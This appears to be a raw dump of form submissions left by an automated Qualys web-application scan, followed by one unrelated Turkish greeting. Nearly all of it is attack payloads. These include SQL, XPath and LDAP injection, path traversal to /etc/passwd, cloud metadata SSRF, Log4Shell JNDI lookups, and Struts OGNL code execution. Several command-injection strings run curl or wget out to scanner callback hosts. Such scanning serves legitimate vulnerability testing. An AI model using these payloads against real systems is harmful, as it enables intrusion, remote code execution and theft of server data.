1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1
1;SELECT sleep(29); --
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
1
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
aaaa&ping -n 92 localhost&
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1
1' or not(false()) or 'true' = 'true
1
1' and false() and 'or' = 'and
1
1' or true() or 'and' = 'and
1
15 oR 9=8 + 1
1
11 or 11=12
1
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1
1' and 'tpklq'='xqlkp
1
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1 aND 7248=2491 + 4757
1
1
1 and 7248 IS NULL
1
1 and NULL IS NULL
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1
1
1 or NULL IS NULL
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1
1 and 4325=2728 --
1
1 or 4325=4325 --
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1
1
1' and 3789=1391 --
1
1' or 3789=3789 --
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
1
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl 2d6b94fe1330f80d0dab0396b375e0861023a918.17852627393642422.1802885332.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
__import__('os').popen('wget 816cabf938545606a8c08dacb3a9fa1647254694.17852627393642422.3717209095.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 33856372a8593ab42e21d7f71b8ee051f6ca83c1.17852627393642422.3672577294.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 3eaa43df0ffdda5d50bbb879e6d45b2a738243da.17852627393642422.489617102.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl dd11eb25272bf874ce4a25debb84e8994e25f443.17852627393642422.142339929.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","9baa83743a2f2dde1bea65050506c14e021648b3.17852627393642422.320140400.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://c27038703c460e696fb0f6257dd0a94c4c20661c.17852627393642422.2568302259.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://9cea6a8b566b361ffff5e70b47c4261dac07179b.17852627393642422.1435044327.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//39d567fbc13478d77571570cf9ba475034136710.17852627393642422.424625104.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://86c6c545dba2e9ee3e107fd7530299f87b4261ce.17852627393642422.3160292528.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//6a10ec35e0e66783e926b4dcb7e409ee3a8a279f.17852627393642422.4101897324.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://0a198150a0be58351b28dff8e8f62d958f585126.17852627393642422.374511717.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//fb3841b9b762aaf174e55e92951c5bfb67b224b0.17852627393642422.964685235.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://adee6ca3de331e7ae500a8c12163f084c7dbd51d.17852627393642422.3503477638.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://79f41c8ea144bf857e5a5ebf5e313278cf5a9e2d.17852627393642422.31024178.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://756679c9e33be38a3472a3e8a9f32362fa07dd43.17852627393642422.4051819093.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://018b9cc21b19c9295561ac226b33f237cc36e00d.17852627393642422.2719859429.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
c70604669da472cbfecda60908bf7b236d17f0ca.17852627393642422.1709341512.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://e79dea77b24de4a7b7155e26661516ce8895d17f.17852627393642422.1268609881.ssrf01.ssrf.eu2.qualysperiscope.com.
1
Joe+ bcc:was_engine@a01fd632ae5074eca3c0c793ca5592da6744d0a6.17852627393642422.2198096657.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1
1*(|(objectclass=*))
1
1)(uid=*))(|(uid=*
1
1)(attribute2=*)
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxss89745IgE};
1
qualyswas:
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxssRFX49V96()-"
1
'-qxssQsd9kHFC()-'
1
*/;(function(){qxsss541SdNp});/*
1
9 ;(function(){qxss90Y7l604});//
1
9;(function(){qxss08glnUJC});//
1
';(function(){qxss89xyWZgc});/**/'
1
qualys(aqxssviK1o33l)xyz
1
");(function(){qxsspc3Xmwpv});/**/"
1
";(function(){qxssVpn0BiY5});/**/"
1
javascript:qxss(X168735788Y1_2Z);
1
http://rfitest/
1
|netstat -an
a(){}phpinfo(); function a
1
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
....//....//....//....//....//....//etc/passwd
1
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
../../../../../../../Windows/System32/drivers/etc/hosts
1
//....//....//....//....//....//....//....//etc/passwd
1
//..//..//..//..//..//..//..//etc/passwd
1
../../../../../../../etc/passwd
/../../../../../../../etc/passwd
1
/../../../../../../../etc/passwd
1
1
1
1e309
1
(
1
,
1
``
1
/*
1
#
1
;--
1
1'
1
qualyswasesi
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
111222
1
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
1
< script a=4>qssNVd3jSI3=7< /script>
1
" onEvent=X168735788Y1_2Z
1
' onEvent=X168735788Y1_2Z
"'>
1
1
1
BODY{background:url("javascript:qssFZ0i0S7T=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(TZzV557V)
1
_q=random(X168735788Y1_2Z)
1
_q=random(X168735788Y1_2Z)
1
"'>
1
z-->
1"'>
1
1
">
1
javascript:qxss(X168735788Y1_2Z);
1
" onEvent=X168735788Y1_2Z
1
' onEvent=X168735788Y1_2Z
1
_q=random(X168735788Y1_2Z)
1
"'>
1
1
1(#context["xwork.MethodAccessor.denyMethodExecution"]= new java.lang.Boolean(false), #_memberAccess["allowStaticMethodAccess"]= new java.lang.Boolean(true), @java.lang.Thread@sleep(28*1000))
1
require('child_process').execSync('sleep 29').toString()
1
__import__('os').popen('sleep 29').read()
1
1' + sleep(29*100*Math.sqrt(100)) + '
1
1'; var djci=sleep(29*1000) + '
1
1'; var djci=sleep(29*1000);//
1
1' OR (SELECT 1337 FROM (SELECT(SLEEP(29)))prime) AND 'qualys'='qualys
1
1' WHERE 1337=1337 AND (SELECT 1319 FROM (SELECT(SLEEP(29)))qualys)-- prime
1
1(SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333) /*'XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR'|"XOR (SELECT 0 FROM (SELECT SLEEP(29))qsqli_3333); -- OR"*/
1;SELECT sleep(29); --
1
1
1' + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_2222) + '
1
1 + (SELECT 0 FROM (SELECT SLEEP(29))qsqli_1111)
1
1',0,0);WAITFOR DELAY'00:00:29'--
1
1');WAITFOR DELAY '00:00:29'--
1
1';WAITFOR DELAY '00:00:29'--
1
1);WAITFOR DELAY '00:00:29'--
1
1;WAITFOR DELAY '00:00:29';
1
1WAITFOR DELAY '00:00:29'
|ping -c2 -i91 localhost|
1
|ping -c2 -i56 localhost
1
ping -c2 -i91 localhost
1
1
aaaa&ping -n 92 localhost&
1
1
1
1
1" or not(false()) or "true" = "true
1
1" and false() and "or" = "and
1
1" or true() or "and" = "and
1
1 or not(false()) or 'true' = 'true'
1
1 and false() and 'or' = 'and'
1
1 or true() or 'and' = 'and'
1' or not(false()) or 'true' = 'true
1' and false() and 'or' = 'and
1
1
1
1' or true() or 'and' = 'and
1
1
15 oR 9=8 + 1
11 or 11=12
1
11 or 11=11
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
1' and 'tpklq'='xqlkp
1
1
1' or 'tpklq'='tpklq
1
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
1
1
1') and 'swqtp'='ptqws
1
1') or 'swqtp'='swqtp
1
1
1
1 aND 7248=2491 + 4757
1 and 7248 IS NULL
1 and NULL IS NULL
1
1
1 oR 6248=2491 + 3757
1
1 or 6248 IS NULL
1 or NULL IS NULL
1
1
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
1 and 4325=2728 --
1
1 or 4325=4325 --
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
1' and 3789=1391 --
1
1
1' or 3789=3789 --
1
1
1
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
1') and 2634=1123 --
1
1') or 2634=2634 --
1
1
1
file:///etc/passwd
1
1
1
http://localhost:19096
$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl d1f7b70b0068bf86bd57d4e8f95ac76c8d20ad3e.17828695393642422.2713624756.oscomm15279701.oscomm.eu2.qualysperiscope.com.').toString())";QualysWAS=''[['constructor']][['constructor']](p);QualysWAS())]
1
1
__import__('os').popen('wget 1e2a06d7db297645aadbd329b1e3d0625b53b309.17828695393642422.3519889129.oscomm15214101.oscomm.eu2.qualysperiscope.com.').read()
1
__import__('os').popen('curl 11fd6154add94ea5680ecb88a33872e310fb2a5d.17828695393642422.46711785.oscomm15214100.oscomm.eu2.qualysperiscope.com.').read()
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 2f2e28145f1b763ffe6246bd444d128ded95f807.17828695393642422.1448834685.oscomm15256401.oscomm.eu2.qualysperiscope.com.#""")
1
@pd.core.frame.com.builtins.__import__("os").system("""curl 6702607e41a327173a621536ca05070119776ae9.17828695393642422.2884076366.oscomm15256400.oscomm.eu2.qualysperiscope.com.#""")
1
${"".getClass().forName("java.net.InetAddress").getMethod("getByName","".getClass()).invoke("","7b0f79f58dd13c9449b81605650e475bc4950344.17828695393642422.3184648426.oscomm15079701.oscomm.eu2.qualysperiscope.com.")}
1
1
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://6c3a2f8be0b99f688b9ffcbcd5de6d611aac5d90.17828695393642422.3299533505.log4j12.log4j.eu2.qualysperiscope.com./QualysWAS}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://d0e3bf2c53d04f9b248130c6ced4076c5f23eeda.17828695393642422.3311706952.log4j11.log4j.eu2.qualysperiscope.com./QualysWAS}
1
1
${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//7f2e1c8d5669705bf7044efa3479432345b57cd9.17828695393642422.4070864684.log4j10.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:dns://a785e7e56b1314aef07608ff12344d0997b4c5c4.17828695393642422.3619931040.log4j09.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//d8ba9dd920fc5f7eaf3848bf218363e204cc99ac.17828695393642422.606816100.log4j08.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jnd${123%ff:-${123%ff:-i:}}ldap://8d3126a9a9d916f68c3b0ad8cca66d01a403a7ef.17828695393642422.1802829043.log4j07.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${j${::-n}di:ldap${::-:}//eab9fce7dae4d88bcbab535727faedd8420f531f.17828695393642422.1761301623.log4j06.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://01ed0d12b2f7f003fd88d82f6a32289a5101dd32.17828695393642422.228374446.log4j05.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://8682cf8702cae08a36fb694f8fd096ead09ca953.17828695393642422.933277680.log4j04.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:rmi://05dd42a1ab2321aed58246384c136e39dc86ef95.17828695393642422.168747672.log4j03.log4j.eu2.qualysperiscope.com./QualysWAS}
1
${jndi:ldap://8aac5b036448a66b6f6f74f43d801e9b0e06bcc5.17828695393642422.3692147271.log4j02.log4j.eu2.qualysperiscope.com./QualysWAS}
1
431c210bf70ed3284962380927df34dbc5efa9fa.17828695393642422.1544128464.ssrf02.ssrf.eu2.qualysperiscope.com.
1
http://4c674fba69db31d2c25648c28fcb42519d3588f9.17828695393642422.701343188.ssrf01.ssrf.eu2.qualysperiscope.com.
Joe+ bcc:was_engine@2a9d8fed696614923a9a8e589c08e0394df819d1.17828695393642422.3461584469.smtphi01.smtp.eu2.qualysperiscope.com.
1
1)(|(uidNumber=*)
1
1
1)(|(gidNumber=*)
1
1)(|(homeDirectory=*)
1
1)(|(uid=*)
1
1)(|(objectclass=*)
1
1*
1
1)(|(cn=*))
1*(|(objectclass=*))
1
1
1)(uid=*))(|(uid=*
1)(attribute2=*)
1
1
QualysWAS${150797*150797}QualysWAS
1
${''.getClass().forName('java.lang.Runtime').getMethods()[6].toString()}
1
QualysWAS${"150898".toString().replace("8", "7")}QualysWAS
1
https://community.qualys.com/
1
http://169.254.169.254/latest/meta-data/
1
function(){qxsspWLf84qD};
qualyswas:
1
1
(23.0231*213.759)
1
;echo 23.0231*213.759;//{@math key=4335.158242899999 method="add" operand=586.23659/} /* #set($value=23.0231*213.759) $value */
1
1
|aaaa =(23.0231*213.759) |${23.0231*213.759}{23.0231*213.759}4921.3948329(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}
1
!@#$%^&*()
1
!@#$%^&*()1
1
1!@#$%^&*()
1
1
1
"-qxsszXiVZn4x()-"
1
'-qxss5r5V5x0M()-'
1
*/;(function(){qxssglc70Xnb});/*
1
9 ;(function(){qxssETPqqZix});//
1
9;(function(){qxssES32uJ6x});//
1
';(function(){qxssy52K09nk});/**/'
1
qualys(aqxssiohttI5p)xyz
1
");(function(){qxss4ogVpozW});/**/"
1
";(function(){qxssl4M00mBP});/**/"
1
javascript:qxss(X2983573204Y1_2Z);
http://rfitest/
1
1
|netstat -an
1
a(){}phpinfo(); function a
1
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q2d1hi3j').(#str3='B4D7e6').(#str=#str2+':QQ:'+#str1+':PP:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
1
%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1='A2B8C3').(#str2='q9d4hi5j').(#str3='R9D7e8').(#str=#str2+':QQ:'+#str1+':TT:'+#str3).(#cmd='echo '+ #str).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
1
....//....//....//....//....//....//etc/passwd
1
php://filter/read=string.rot13/resource=/etc/passwd
1
../../../../../../../Windows/System32/drivers/etc/hosts
../../../../../../../Windows/System32/drivers/etc/hosts
1
1
//....//....//....//....//....//....//....//etc/passwd
//..//..//..//..//..//..//..//etc/passwd
1
1
../../../../../../../etc/passwd
/../../../../../../../etc/passwd
1
1
/../../../../../../../etc/passwd
1
1
1e309
1
(
1
,
1
``
/*
1
1
#
1
;--
1'
1
1
qualyswasesi
q Qualys_resp_hdr_injection: Vulnerable
1
1
q Qualys_resp_hdr_injection: Vulnerable
1
q Content-Type:text/html Content-Length: 190 HTTP/1.1 200 OK Content-Type: text/html Set-Cookie: a=q Content-Length: 2 AA
1
111222
1
1
%3cscript z%3e_q(y)%3c/script%3e
1
1
< script a=4>qssKiamkFJa=7< /script>
" onEvent=X2983573204Y1_2Z
1
1
' onEvent=X2983573204Y1_2Z
1
"'>
1
1
BODY{background:url("javascript:qssX72S4glk=7")}
1
1">
1
1
1
"'>
1
1
1
1
1 _q_q=random(rfX19x3e)
_q=random(X2983573204Y1_2Z)
1
1
_q=random(X2983573204Y1_2Z)
1
"'>
1
z-->
1
1"'>
1
">
1
javascript:qxss(X2983573204Y1_2Z);
1
" onEvent=X2983573204Y1_2Z
1
' onEvent=X2983573204Y1_2Z
1
_q=random(X2983573204Y1_2Z)
1
"'>
1
Merhaba! Ben Özgür 22 yaşındayım.